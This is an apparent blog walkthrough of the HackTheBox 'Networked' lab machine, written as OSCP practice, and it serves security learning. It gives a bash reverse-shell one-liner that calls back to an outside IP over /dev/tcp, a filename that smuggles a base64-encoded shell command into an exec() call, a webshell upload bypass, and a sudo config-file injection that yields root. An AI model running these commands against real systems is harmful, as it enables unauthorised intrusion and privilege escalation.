Road to OSCP 7: Networked HackTheBox
How to use this walkthrough?
To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
I use Tib3rius' multi-threaded AutoRecon, which combines several tools to enumerate and scan services. It creates a simple file structure and gives you a nice overview of the scanned services.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.146
While it runs, I usually look at the _quick_tcp_nmap.txt file until the _full_tcp_nmap.txt is ready.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8=
| 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https reset ttl 63
Apart from SSH, which we cannot do much with yet, there is really only one interesting port here, so let's focus on port 80.
Web server — port 80
Gobuster shows a couple of interesting URLs:
/backup (Status: 301) [Size: 235]
/index.php (Status: 200) [Size: 229]
/lib.php (Status: 200) [Size: 0]
/photos.php (Status: 200) [Size: 1302]
/upload.php (Status: 200) [Size: 169]
/uploads (Status: 301) [Size: 236]
Let us see what they hold
We have an upload section
A backup of the site
We downloaded the backup and extracted it:
tar -xvf backup.tar
lib.php is just a library of functions.
photos.php shows the last 4 uploaded pictures
index.php returns the normal main page
upload.php is the main upload page
/uploads is where the pictures are stored
The path is clear: we need to understand what the upload restrictions are and find a way to bypass them so we can upload a PHP webshell or reverse shell.
Can you create a webshell that bypasses those restrictions?
We can see that we need a valid mime type, have to stay below 6000Kb, and the extension needs to be .jpg, .png, .gif or .jpeg. One of these extensions is just better…
The tutorial I followed for this step: File Upload Attacks - PHP Reverse Shell
Let’s follow the tutorial and upload the webshell with the correct mime type.
We can see in photos.php that whatever we upload shows up as “uploaded_by_<IP>.<extension>”.
Let’s look for our webshell in
Let's capture the request and work directly inside Burp.
Let’s get a reverse shell now!
Don’t forget to start your listener!
nc -nlvp 4444
We are in!
Time for some shell upgrade 😉
- python -c 'import pty; pty.spawn("/bin/bash")'
- Ctrl+Z to background the shell, then in your own terminal: stty raw -echo
- fg (nothing will show on the screen, just press Enter a couple of times)
Let’s do some recon!
We find an odd cron job in Guly’s home directory
What is the only thing we actually have influence on in this code?
$value: we can create files inside $path (/var/www/html/uploads) and the code will loop through them! Each filename is then used in this beautiful line.
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
The idea is simple: create a file whose name is the command we want to run, and play it like a command-injection bypass, since the name is interpolated straight into the exec() string.
We try to create a file whose name is a reverse shell one-liner, but one constraint stops us: “/” is not allowed in a Linux filename.
Can you find a beautiful way to create a reverse shell without using ‘/’? What is the beloved technique used by PowerShell to encode its commands?
Transform them to BASE64!
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.18/777 0>&1"' | base64 -w0
Now we just need to create the file and wait ❤
Don't forget the listener (nc -nlvp 777 to match the payload)!!!
touch ";echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOC83NzcgMD4mMSIK| base64 -d | bash"
We are Guly! Let’s own this server
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a DB password or even a user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
The first one is a charm!
What does that file do?
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
	echo "interface $var:"
	read x
	while [[ ! $x =~ $regexp ]]; do
		echo "wrong input, try again"
		echo "interface $var:"
		read x
	done
	echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
It creates ifcfg-guly, then loops over four variables (NAME, PROXY_METHOD, BROWSER_ONLY, BOOTPROTO), asks the user for each value, checks it against the regexp (letters, digits, underscore, space, slash and hyphen are allowed) and appends $var=$value to the file.
This took a bit of trial and error to understand how we were supposed to exploit it. After trying for a while, I found that adding a space in our input executes the second part of the value. The reason: ifcfg-* files are shell syntax that the network scripts source when they bring the interface up, so an unquoted line such as NAME=guly0 /bin/bash is read as "run /bin/bash with NAME=guly0 in its environment". The regexp lets both the space and the slash through, and since the script runs through sudo, the command runs as root.
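As an added example (not the box's script), the following reproduces the root cause locally: a config line written unquoted by the script passes its regexp and, once the file is sourced like an ifcfg file, the word after the space runs as a command. Here the sourcing happens in a subshell as the current user and the command only drops a marker; the safe variant reads the key without handing the file to the shell.

```shell
#!/bin/sh
# Added example: "config file sourced as shell" failure mode behind the
# ifcfg-guly trick, with a parser that does not execute anything.

# Same character set as the sudo script's regexp: letters, digits, '_', ' ', '/', '-'.
passes_filter() {
    printf '%s\n' "$1" | grep -Eq '^[a-zA-Z0-9_ /-]+$'
}

# What the network scripts do with ifcfg-*: source it (subshell here so the
# caller's environment is untouched).
source_like_ifup() {
    ( . "$1" ) 2>/dev/null
}

# Safe alternative: return the value of one key by splitting on '='.
read_key() {
    while IFS='=' read -r k v; do
        if [ "$k" = "$2" ]; then printf '%s\n' "$v"; return 0; fi
    done < "$1"
    return 1
}

# Returns 0 when the command hidden after the space was executed.
demo_sourced() {
    dir=$(mktemp -d /tmp/ifcfg_XXXXXX)   # no '.' so the marker path passes the filter
    cfg="$dir/ifcfg-demo"; marker="$dir/marker"
    input="guly0 touch $marker"
    if ! passes_filter "$input"; then rm -rf "$dir"; return 1; fi
    echo "NAME=$input" > "$cfg"           # unquoted, exactly as the script writes it
    source_like_ifup "$cfg"
    if [ -e "$marker" ]; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return $rc
}

# Returns 0 when the value is recovered intact and nothing was executed.
demo_parsed() {
    dir=$(mktemp -d /tmp/ifcfg_XXXXXX)
    cfg="$dir/ifcfg-demo"; marker="$dir/marker"
    echo "NAME=guly0 touch $marker" > "$cfg"
    v=$(read_key "$cfg" NAME)
    if [ "$v" = "guly0 touch $marker" ] && [ ! -e "$marker" ]; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return $rc
}

demo_sourced && echo "sourced: the word after the space ran as a command"
demo_parsed && echo "parsed: value read, nothing executed"
```

On the box the sourcing is done by the network scripts as root, which is why a value like guly0 /bin/bash hands you a root shell.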
We own this place!
What did I learn?
- We learned how to bypass upload restrictions with the gif extension
- We learned about embedding code into filenames for execution
- We learned how to spot interesting weaknesses in code and abuse them
Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.